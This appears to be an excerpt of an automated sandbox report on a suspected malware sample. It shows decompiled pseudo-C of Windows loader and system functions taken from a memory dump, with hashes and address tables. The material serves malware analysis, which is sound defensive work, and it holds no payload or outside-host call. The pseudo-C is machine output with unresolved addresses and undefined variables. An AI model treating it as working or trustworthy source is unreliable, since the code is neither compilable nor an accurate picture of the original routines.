                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                  • Opcode ID: 347e17627b4395e39eacd659a8337f88f54033b13a706b9b9fcde6145b821698
                                                                                                                                                                                  • Instruction ID: 6ad59704aade30a34782953e6f62cfb5e4685fb7ff173595a70626d5c414c106
                                                                                                                                                                                  • Opcode Fuzzy Hash: 347e17627b4395e39eacd659a8337f88f54033b13a706b9b9fcde6145b821698
                                                                                                                                                                                  • Instruction Fuzzy Hash: C531BD31A46B02AFFB459F24C980F8ABBA9FF44754F049025E94197E50DB74F821CB80
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333CE372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                                  			E333CE372(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t64;
				signed int _t65;
				signed int _t66;
				signed int _t68;
				void* _t69;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t101;
				void* _t106;
				intOrPtr _t108;
				signed int _t109;
				short* _t111;
				signed int _t113;
				intOrPtr _t120;
				signed int* _t122;
				void* _t124;
				signed short* _t126;
				void* _t127;
				void* _t129;

				_push(0x80);
				_push(0x3342cbc0);
				L333A7C40(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t127 - 0x80)) = __edx;
				_t122 =  *(_t127 + 0xc);
				 *(_t127 - 0x7c) = _t122;
				 *((char*)(_t127 - 0x65)) = 0;
				 *((intOrPtr*)(_t127 - 0x64)) = 0;
				 *((intOrPtr*)(_t127 - 0x6c)) = 0;
				 *((intOrPtr*)(_t127 - 4)) = 0;
				_t101 = __ecx;
				if(_t101 == 0) {
					 *(_t127 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E3335FED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t127 - 0x65)) = 1;
					_t64 =  *(_t127 - 0x90);
					_t102 = _t64[2];
					_t65 =  *_t64 & 0x0000ffff;
					L20:
					_t66 = _t65 >> 1;
					L21:
					_t111 =  *((intOrPtr*)(_t127 - 0x80));
					if(_t111 == 0) {
						L27:
						 *_t122 = _t66 + 1;
						_t68 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t127 - 0x64)) = _t68;
						L29:
						 *((intOrPtr*)(_t127 - 4)) = 0xfffffffe;
						_t69 = E333CE588(0);
						 *[fs:0x0] =  *((intOrPtr*)(_t127 - 0x10));
						return _t69;
					}
					if(_t66 >=  *((intOrPtr*)(_t127 + 8))) {
						if(_t111 != 0 &&  *((intOrPtr*)(_t127 + 8)) >= 1) {
							 *_t111 = 0;
						}
						goto L27;
					}
					 *_t122 = _t66;
					_t124 = _t66 + _t66;
					E333988C0(_t111, _t102, _t124);
					 *((short*)(_t124 +  *((intOrPtr*)(_t127 - 0x80)))) = 0;
					_t68 = 0;
					goto L28;
				}
				_t106 = _t101 - 1;
				if(_t106 == 0) {
					_t126 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E3336AA60("true", _t126, 0x33321890, _t127 - 0x74);
					 *((intOrPtr*)(_t127 - 0x64)) = _t74;
					_t102 = _t126[2];
					if(_t74 < 0) {
						_t65 =  *_t126 & 0x0000ffff;
						_t122 =  *(_t127 - 0x7c);
						goto L20;
					}
					_t66 = (( *(_t127 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t122 =  *(_t127 - 0x7c);
					goto L21;
				}
				if(_t106 == 1) {
					_t108 = 4;
					 *((intOrPtr*)(_t127 - 0x78)) = _t108;
					 *((intOrPtr*)(_t127 - 0x70)) = 0;
					_push(_t127 - 0x70);
					_push(0);
					_push(0);
					_push(_t108);
					_push(_t127 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t127 - 0x64)) = E33393FC0();
					 *((intOrPtr*)(_t127 - 0x64)) = 0;
					_t120 = L33365D90(_t108,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t127 - 0x70)));
					 *((intOrPtr*)(_t127 - 0x6c)) = _t120;
					if(_t120 != 0) {
						_push(_t127 - 0x70);
						_push( *((intOrPtr*)(_t127 - 0x70)));
						_push(_t120);
						_push(4);
						_push(_t127 - 0x78);
						_push(0x6b);
						_t84 = E33393FC0();
						 *((intOrPtr*)(_t127 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t113 = 0;
						_t109 = 0;
						while(1) {
							 *((intOrPtr*)(_t127 - 0x84)) = _t113;
							 *(_t127 - 0x88) = _t109;
							if(_t109 >= ( *(_t120 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t113 = _t113 + ( *(_t109 * 0x2c + _t120 + 0x21) & 0x000000ff);
							_t109 = _t109 + 1;
						}
						_t88 = E333CE048(_t109, _t127 - 0x3c, 0x20, _t127 - 0x8c, 0, 0, L"%u", _t113);
						_t129 = _t129 + 0x1c;
						 *((intOrPtr*)(_t127 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t102 = _t127 - 0x3c;
						_t66 =  *((intOrPtr*)(_t127 - 0x8c)) - _t127 - 0x3c >> 1;
						goto L21;
					}
					_t68 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t127 - 0x60);
				_push(0x5a);
				_t94 = E33392D10();
				 *((intOrPtr*)(_t127 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t127 - 0x50)) == 1) {
					_t102 = L"Legacy";
					_push(6);
				} else {
					_t102 = L"UEFI";
					_push(4);
				}
				_pop(_t66);
				goto L21;
			}
























                                                                                                                                                                                  0x333ce372
                                                                                                                                                                                  0x333ce377
                                                                                                                                                                                  0x333ce37c
                                                                                                                                                                                  0x333ce381
                                                                                                                                                                                  0x333ce384
                                                                                                                                                                                  0x333ce387
                                                                                                                                                                                  0x333ce38c
                                                                                                                                                                                  0x333ce38f
                                                                                                                                                                                  0x333ce394
                                                                                                                                                                                  0x333ce397
                                                                                                                                                                                  0x333ce39a
                                                                                                                                                                                  0x333ce39c
                                                                                                                                                                                  0x333ce4f6
                                                                                                                                                                                  0x333ce505
                                                                                                                                                                                  0x333ce50a
                                                                                                                                                                                  0x333ce50e
                                                                                                                                                                                  0x333ce514
                                                                                                                                                                                  0x333ce517
                                                                                                                                                                                  0x333ce51d
                                                                                                                                                                                  0x333ce51d
                                                                                                                                                                                  0x333ce51f
                                                                                                                                                                                  0x333ce51f
                                                                                                                                                                                  0x333ce524
                                                                                                                                                                                  0x333ce557
                                                                                                                                                                                  0x333ce558
                                                                                                                                                                                  0x333ce55a
                                                                                                                                                                                  0x333ce55f
                                                                                                                                                                                  0x333ce55f
                                                                                                                                                                                  0x333ce562
                                                                                                                                                                                  0x333ce562
                                                                                                                                                                                  0x333ce569
                                                                                                                                                                                  0x333ce571
                                                                                                                                                                                  0x333ce57d
                                                                                                                                                                                  0x333ce57d
                                                                                                                                                                                  0x333ce529
                                                                                                                                                                                  0x333ce54a
                                                                                                                                                                                  0x333ce554
                                                                                                                                                                                  0x333ce554
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ce54a
                                                                                                                                                                                  0x333ce52b
                                                                                                                                                                                  0x333ce52d
                                                                                                                                                                                  0x333ce533
                                                                                                                                                                                  0x333ce540
                                                                                                                                                                                  0x333ce544
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ce544
                                                                                                                                                                                  0x333ce3a2
                                                                                                                                                                                  0x333ce3a5
                                                                                                                                                                                  0x333ce4b5
                                                                                                                                                                                  0x333ce4c4
                                                                                                                                                                                  0x333ce4c9
                                                                                                                                                                                  0x333ce4cc
                                                                                                                                                                                  0x333ce4d4
                                                                                                                                                                                  0x333ce4e2
                                                                                                                                                                                  0x333ce4e5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ce4e5
                                                                                                                                                                                  0x333ce4dc
                                                                                                                                                                                  0x333ce4dd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ce4dd
                                                                                                                                                                                  0x333ce3ae
                                                                                                                                                                                  0x333ce3e9
                                                                                                                                                                                  0x333ce3ea
                                                                                                                                                                                  0x333ce3ed
                                                                                                                                                                                  0x333ce3f3
                                                                                                                                                                                  0x333ce3f4
                                                                                                                                                                                  0x333ce3f5
                                                                                                                                                                                  0x333ce3f6
                                                                                                                                                                                  0x333ce3fa
                                                                                                                                                                                  0x333ce3fb
                                                                                                                                                                                  0x333ce402
                                                                                                                                                                                  0x333ce405
                                                                                                                                                                                  0x333ce41b
                                                                                                                                                                                  0x333ce41d
                                                                                                                                                                                  0x333ce422
                                                                                                                                                                                  0x333ce431
                                                                                                                                                                                  0x333ce432
                                                                                                                                                                                  0x333ce435
                                                                                                                                                                                  0x333ce436
                                                                                                                                                                                  0x333ce43b
                                                                                                                                                                                  0x333ce43c
                                                                                                                                                                                  0x333ce43e
                                                                                                                                                                                  0x333ce443
                                                                                                                                                                                  0x333ce448
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ce44e
                                                                                                                                                                                  0x333ce450
                                                                                                                                                                                  0x333ce452
                                                                                                                                                                                  0x333ce452
                                                                                                                                                                                  0x333ce458
                                                                                                                                                                                  0x333ce464
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ce46e
                                                                                                                                                                                  0x333ce470
                                                                                                                                                                                  0x333ce470
                                                                                                                                                                                  0x333ce488
                                                                                                                                                                                  0x333ce48d
                                                                                                                                                                                  0x333ce490
                                                                                                                                                                                  0x333ce495
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ce49b
                                                                                                                                                                                  0x333ce4a8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ce4a8
                                                                                                                                                                                  0x333ce424
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ce424
                                                                                                                                                                                  0x333ce3b0
                                                                                                                                                                                  0x333ce3b1
                                                                                                                                                                                  0x333ce3b6
                                                                                                                                                                                  0x333ce3b7
                                                                                                                                                                                  0x333ce3b9
                                                                                                                                                                                  0x333ce3be
                                                                                                                                                                                  0x333ce3c3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ce3cf
                                                                                                                                                                                  0x333ce3da
                                                                                                                                                                                  0x333ce3df
                                                                                                                                                                                  0x333ce3d1
                                                                                                                                                                                  0x333ce3d1
                                                                                                                                                                                  0x333ce3d6
                                                                                                                                                                                  0x333ce3d6
                                                                                                                                                                                  0x333ce3e1
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID: Legacy$UEFI
                                                                                                                                                                                  • API String ID: 2994545307-634100481
                                                                                                                                                                                  • Opcode ID: 3a7d13a4decac570c0a28670dcfd94aed976230cec983cf2063d8ca7f5ce6749
                                                                                                                                                                                  • Instruction ID: 7df3f6d235b0d8485689a4a6e2d8a104814c09423c766a917184f14a6ab737c5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a7d13a4decac570c0a28670dcfd94aed976230cec983cf2063d8ca7f5ce6749
                                                                                                                                                                                  • Instruction Fuzzy Hash: 44615BB6E423489FEB14CFA8C880AADB7B8FB44741F148039E559EB261EA31DD40CB50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3342B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3342B5C4
                                                                                                                                                                                  • RedirectedKey, xrefs: 3342B60E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                                                  • API String ID: 0-1388552009
                                                                                                                                                                                  • Opcode ID: e5afae4a0aefc56c14fef5e3300fbffdbb738164fa0cdb0133f8b8084cc3ca5d
                                                                                                                                                                                  • Instruction ID: edb81bbb5aa33bde745f09452efb285da860415bc5e475f31d962cf20e1762db
                                                                                                                                                                                  • Opcode Fuzzy Hash: e5afae4a0aefc56c14fef5e3300fbffdbb738164fa0cdb0133f8b8084cc3ca5d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5561F0B5C01618EFDB11DF94C888ADEBFB8FB48710F54806AE904F7200DB749A46CBA0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3336F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                                  			E3336F640(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				void* _t85;
				intOrPtr _t89;
				intOrPtr _t96;
				signed int _t99;
				signed int _t109;
				signed int _t114;
				signed int _t117;
				void* _t120;
				intOrPtr _t123;
				signed int _t128;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t137;
				void* _t139;
				void* _t141;

				_push(0x78);
				_push(0x3342c3a0);
				E333A7BE4(__ebx, __edi, __esi);
				_t137 =  *[fs:0x18];
				 *((intOrPtr*)(_t139 - 0x24)) = _t137;
				_t74 =  *[fs:0x30];
				 *((intOrPtr*)(_t139 - 0x2c)) =  *[fs:0x30];
				_t128 =  *(_t137 + 0xfb4);
				 *(_t139 - 0x20) = _t128;
				if(_t128 != 0) {
					_push("true");
					_t121 = _t128;
					E33354779(_t74, _t128);
				}
				if(( *( *[fs:0x18] + 0xfca) & 0x00000008) != 0) {
					_t76 =  *[fs:0x18];
					__eflags =  *(_t76 + 0xfca) & 0x00000020;
					if(( *(_t76 + 0xfca) & 0x00000020) == 0) {
						L26:
						_t109 = 0;
						L19:
						__eflags = _t128;
						if(_t128 != 0) {
							 *(_t137 + 0xfb4) = _t109;
							_push(2);
							_t121 = _t128;
							E33354779(_t76, _t128);
						}
						_t129 =  *(_t137 + 0xf94);
						__eflags = _t129;
						if(_t129 != 0) {
							 *(_t137 + 0xf94) = _t109;
							E3335FED0(0x33445b40);
							_push(0x33445b40);
							E3335E740(_t111);
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109, _t129);
						}
						__eflags =  *(_t137 + 0xfca) & 0x00000004;
						if(( *(_t137 + 0xfca) & 0x00000004) != 0) {
							 *(_t137 + 0x10) = _t109;
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109,  *(_t137 + 0x10));
						}
						E33384940();
						_t85 = 0x400;
						__eflags =  *(_t137 + 0xfca) & 0x00000400;
						if(( *(_t137 + 0xfca) & 0x00000400) != 0) {
							__eflags =  *0x334465f4 - 3;
							if( *0x334465f4 == 3) {
								_t85 = E33424080(_t111, _t121);
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0x10));
						return _t85;
					}
				}
				_t76 = 0x2000;
				if(( *(_t137 + 0xfca) & 0x00002000) != 0) {
					goto L26;
				}
				_t111 = 0x1000;
				_t109 = 0;
				if(( *( *[fs:0x18] + 0xfca) & 0x00001000) != 0) {
					 *((char*)(_t139 - 0x19)) = 1;
				} else {
					 *((char*)(_t139 - 0x19)) = 0;
					_t111 = 0;
					E333719DF(0);
				}
				E33372755(_t121);
				 *(_t139 - 4) = _t109;
				_t89 =  *0x33445da0; // 0x3007460
				while(_t89 != 0x33445d9c) {
					_t16 = _t89 - 0x10; // 0x3007450
					_t123 = _t16;
					 *((intOrPtr*)(_t139 - 0x30)) = _t123;
					_t18 = _t89 + 4; // 0x3006b70
					_t96 =  *_t18;
					 *((intOrPtr*)(_t139 - 0x28)) = _t96;
					 *((intOrPtr*)(_t139 - 0x38)) = _t96;
					_t21 = _t123 + 0x34; // 0xca2cc
					_t111 =  *_t21;
					_t24 = _t123 + 0x18; // 0x70120000
					if( *((intOrPtr*)( *((intOrPtr*)(_t139 - 0x2c)) + 8)) !=  *_t24 && (_t111 & 0x00040000) == 0) {
						_t27 = _t123 + 0x1c; // 0x70129bf0
						_t99 =  *_t27;
						 *(_t139 - 0x34) = _t99;
						if(_t99 != 0 && _t111 == 0x80004) {
							 *(_t139 - 0x3c) = _t99;
							 *((intOrPtr*)(_t139 - 0x60)) = 0x24;
							 *(_t139 - 0x5c) = 1;
							_t117 = 7;
							memset(_t139 - 0x58, 0, _t117 << 2);
							_t141 = _t141 + 0xc;
							_t34 = _t123 + 0x48; // 0x0
							L3336DC40(_t139 - 0x60,  *_t34);
							 *(_t139 - 4) = 1;
							_t135 =  *((intOrPtr*)(_t139 - 0x30));
							_t155 =  *((intOrPtr*)(_t135 + 0x3a)) - _t109;
							if( *((intOrPtr*)(_t135 + 0x3a)) != _t109) {
								_t120 = 3;
								E3336F0A3(_t109, _t120, _t135, _t135, _t137, _t155);
							}
							_push(_t109);
							_push(3);
							_t111 =  *(_t139 - 0x34);
							L3336DCD1(_t109,  *(_t139 - 0x34),  *((intOrPtr*)(_t135 + 0x18)), _t135, _t137, _t155);
							 *(_t139 - 4) = _t109;
							_t128 =  *(_t139 - 0x20);
							E3336F85E();
						}
					}
					_t89 =  *((intOrPtr*)(_t139 - 0x28));
				}
				_t121 =  *0x33445b24; // 0x2fe2d40
				__eflags =  *((intOrPtr*)(_t121 + 0x3a)) - _t109;
				if( *((intOrPtr*)(_t121 + 0x3a)) != _t109) {
					 *((intOrPtr*)(_t139 - 0x84)) = 0x24;
					 *(_t139 - 0x80) = 1;
					_t114 = 7;
					__eflags = 0;
					memset(_t139 - 0x7c, 0, _t114 << 2);
					_t49 = _t121 + 0x48; // 0x0
					L3336DC40(_t139 - 0x84,  *_t49);
					 *(_t139 - 4) = 2;
					_t121 =  *0x33445b24; // 0x2fe2d40
					_t111 = 3;
					E3336F0A3(_t109, _t111, _t121, _t139 - 0x7c + _t114, _t137, __eflags);
					 *(_t139 - 4) = _t109;
					_t128 =  *(_t139 - 0x20);
					E3336F87D();
				}
				 *(_t139 - 4) = 0xfffffffe;
				E3336F867(_t109, _t111);
				_t76 = E33386540(_t111);
				goto L19;
			}



















                                                                                                                                                                                  0x3336f640
                                                                                                                                                                                  0x3336f642
                                                                                                                                                                                  0x3336f647
                                                                                                                                                                                  0x3336f64c
                                                                                                                                                                                  0x3336f653
                                                                                                                                                                                  0x3336f656
                                                                                                                                                                                  0x3336f65c
                                                                                                                                                                                  0x3336f65f
                                                                                                                                                                                  0x3336f665
                                                                                                                                                                                  0x3336f66a
                                                                                                                                                                                  0x3336f66c
                                                                                                                                                                                  0x3336f66e
                                                                                                                                                                                  0x3336f670
                                                                                                                                                                                  0x3336f670
                                                                                                                                                                                  0x3336f682
                                                                                                                                                                                  0x333b9c28
                                                                                                                                                                                  0x333b9c2e
                                                                                                                                                                                  0x333b9c35
                                                                                                                                                                                  0x3336f857
                                                                                                                                                                                  0x3336f857
                                                                                                                                                                                  0x3336f7da
                                                                                                                                                                                  0x3336f7da
                                                                                                                                                                                  0x3336f7dc
                                                                                                                                                                                  0x3336f7de
                                                                                                                                                                                  0x3336f7e4
                                                                                                                                                                                  0x3336f7e6
                                                                                                                                                                                  0x3336f7e8
                                                                                                                                                                                  0x3336f7e8
                                                                                                                                                                                  0x3336f7ed
                                                                                                                                                                                  0x3336f7f3
                                                                                                                                                                                  0x3336f7f5
                                                                                                                                                                                  0x3336f82b
                                                                                                                                                                                  0x3336f836
                                                                                                                                                                                  0x3336f83b
                                                                                                                                                                                  0x3336f840
                                                                                                                                                                                  0x3336f850
                                                                                                                                                                                  0x3336f850
                                                                                                                                                                                  0x3336f7f7
                                                                                                                                                                                  0x3336f7fe
                                                                                                                                                                                  0x333b9c79
                                                                                                                                                                                  0x333b9c87
                                                                                                                                                                                  0x333b9c87
                                                                                                                                                                                  0x3336f804
                                                                                                                                                                                  0x3336f809
                                                                                                                                                                                  0x3336f80e
                                                                                                                                                                                  0x3336f815
                                                                                                                                                                                  0x333b9c91
                                                                                                                                                                                  0x333b9c98
                                                                                                                                                                                  0x333b9c9e
                                                                                                                                                                                  0x333b9c9e
                                                                                                                                                                                  0x333b9c98
                                                                                                                                                                                  0x3336f81e
                                                                                                                                                                                  0x3336f82a
                                                                                                                                                                                  0x3336f82a
                                                                                                                                                                                  0x333b9c3b
                                                                                                                                                                                  0x3336f688
                                                                                                                                                                                  0x3336f694
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336f6a0
                                                                                                                                                                                  0x3336f6a5
                                                                                                                                                                                  0x3336f6ae
                                                                                                                                                                                  0x333b9c40
                                                                                                                                                                                  0x3336f6b4
                                                                                                                                                                                  0x3336f6b4
                                                                                                                                                                                  0x3336f6b7
                                                                                                                                                                                  0x3336f6b9
                                                                                                                                                                                  0x3336f6b9
                                                                                                                                                                                  0x3336f6be
                                                                                                                                                                                  0x3336f6c3
                                                                                                                                                                                  0x3336f6c6
                                                                                                                                                                                  0x3336f6cb
                                                                                                                                                                                  0x3336f6d6
                                                                                                                                                                                  0x3336f6d6
                                                                                                                                                                                  0x3336f6d9
                                                                                                                                                                                  0x3336f6dc
                                                                                                                                                                                  0x3336f6dc
                                                                                                                                                                                  0x3336f6df
                                                                                                                                                                                  0x3336f6e2
                                                                                                                                                                                  0x3336f6e5
                                                                                                                                                                                  0x3336f6e5
                                                                                                                                                                                  0x3336f6ee
                                                                                                                                                                                  0x3336f6f1
                                                                                                                                                                                  0x3336f6fb
                                                                                                                                                                                  0x3336f6fb
                                                                                                                                                                                  0x3336f6fe
                                                                                                                                                                                  0x3336f703
                                                                                                                                                                                  0x3336f713
                                                                                                                                                                                  0x3336f716
                                                                                                                                                                                  0x3336f71d
                                                                                                                                                                                  0x3336f726
                                                                                                                                                                                  0x3336f72c
                                                                                                                                                                                  0x3336f72c
                                                                                                                                                                                  0x3336f72e
                                                                                                                                                                                  0x3336f734
                                                                                                                                                                                  0x3336f739
                                                                                                                                                                                  0x3336f740
                                                                                                                                                                                  0x3336f743
                                                                                                                                                                                  0x3336f747
                                                                                                                                                                                  0x3336f74d
                                                                                                                                                                                  0x3336f74e
                                                                                                                                                                                  0x3336f74e
                                                                                                                                                                                  0x3336f753
                                                                                                                                                                                  0x3336f754
                                                                                                                                                                                  0x3336f759
                                                                                                                                                                                  0x3336f75c
                                                                                                                                                                                  0x3336f761
                                                                                                                                                                                  0x3336f764
                                                                                                                                                                                  0x3336f767
                                                                                                                                                                                  0x3336f767
                                                                                                                                                                                  0x3336f703
                                                                                                                                                                                  0x3336f76c
                                                                                                                                                                                  0x3336f76c
                                                                                                                                                                                  0x3336f774
                                                                                                                                                                                  0x3336f77a
                                                                                                                                                                                  0x3336f77e
                                                                                                                                                                                  0x3336f780
                                                                                                                                                                                  0x3336f78a
                                                                                                                                                                                  0x3336f793
                                                                                                                                                                                  0x3336f794
                                                                                                                                                                                  0x3336f799
                                                                                                                                                                                  0x3336f79b
                                                                                                                                                                                  0x3336f7a4
                                                                                                                                                                                  0x3336f7a9
                                                                                                                                                                                  0x3336f7b0
                                                                                                                                                                                  0x3336f7b8
                                                                                                                                                                                  0x3336f7b9
                                                                                                                                                                                  0x3336f7be
                                                                                                                                                                                  0x3336f7c1
                                                                                                                                                                                  0x3336f7c4
                                                                                                                                                                                  0x3336f7c4
                                                                                                                                                                                  0x3336f7c9
                                                                                                                                                                                  0x3336f7d0
                                                                                                                                                                                  0x3336f7d5
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: $$$
                                                                                                                                                                                  • API String ID: 3446177414-233714265
                                                                                                                                                                                  • Opcode ID: 2a6e02c9344758e683cac8a840dace755ece3cf610bac292f1f8eae6e981b29b
                                                                                                                                                                                  • Instruction ID: be970fc18d338309afac7ce5a5783046837869d1f96b30b236a5a56a5ef5981a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a6e02c9344758e683cac8a840dace755ece3cf610bac292f1f8eae6e981b29b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C61AAB5E41749CFEB20CFA4C9C0B99B7F1BF44308F14C1A9E115ABA94CB74A941CB90
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333E314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                                  			E333E314A(void* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v36;
				char _v44;
				char* _v48;
				short _v50;
				char _v52;
				char* _v56;
				short _v58;
				char _v60;
				intOrPtr* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t29;
				short _t30;
				void* _t31;
				signed char* _t32;
				void* _t42;
				signed char* _t46;
				signed char* _t53;
				void* _t54;
				short _t57;
				intOrPtr* _t61;
				void* _t65;
				void* _t67;
				signed char* _t69;
				void* _t70;
				signed int _t72;

				_t63 = __edx;
				_t74 = (_t72 & 0xfffffff8) - 0x3c;
				_v8 =  *0x3344b370 ^ (_t72 & 0xfffffff8) - 0x0000003c;
				_t65 = __ecx;
				_v64 = __edx;
				_t57 = 0x2e;
				_t29 = 0x30;
				_v58 = _t29;
				_t30 = 0x2c;
				_v60 = _t57;
				_v56 = L"LdrResGetRCConfig Enter";
				_v52 = _t30;
				_v50 = _t57;
				_v48 = L"LdrResGetRCConfig Exit";
				_t31 = L33363C40();
				_t53 = 0x7ffe0385;
				if(_t31 == 0) {
					_t32 = 0x7ffe0385;
				} else {
					_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				_t69 = 0x7ffe0384;
				if(( *_t32 & 0x00000001) != 0) {
					if(L33363C40() == 0) {
						_t46 = 0x7ffe0384;
					} else {
						_t46 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_t63 =  *_t46 & 0x000000ff;
					L333DFC01( &_v60,  *_t46 & 0x000000ff);
				}
				if(_v64 == 0 || _t65 == 0 || _t65 == 0xffffffff) {
					_t66 = 0xc000000d;
					goto L14;
				} else {
					_push(5);
					_push(0x18);
					_push( &_v36);
					_push( &_v44);
					_push(_t65);
					_t42 = E33392AA0();
					_t66 = _t42;
					if(_t42 < 0) {
						L20:
						_pop(_t67);
						_pop(_t70);
						_pop(_t54);
						return E33394B50(_t66, _t54, _v8 ^ _t74, _t63, _t67, _t70);
					}
					_t61 = _v64;
					 *_t61 = _v28;
					 *((intOrPtr*)(_t61 + 4)) = _v24;
					L14:
					if(L33363C40() != 0) {
						_t53 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t53 & 0x00000001) != 0) {
						if(L33363C40() != 0) {
							_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_t63 =  *_t69 & 0x000000ff;
						L333DFC01( &_v52,  *_t69 & 0x000000ff);
					}
					goto L20;
				}
			}

































                                                                                                                                                                                  0x333e314a
                                                                                                                                                                                  0x333e3152
                                                                                                                                                                                  0x333e315c
                                                                                                                                                                                  0x333e3165
                                                                                                                                                                                  0x333e3167
                                                                                                                                                                                  0x333e316b
                                                                                                                                                                                  0x333e316e
                                                                                                                                                                                  0x333e3171
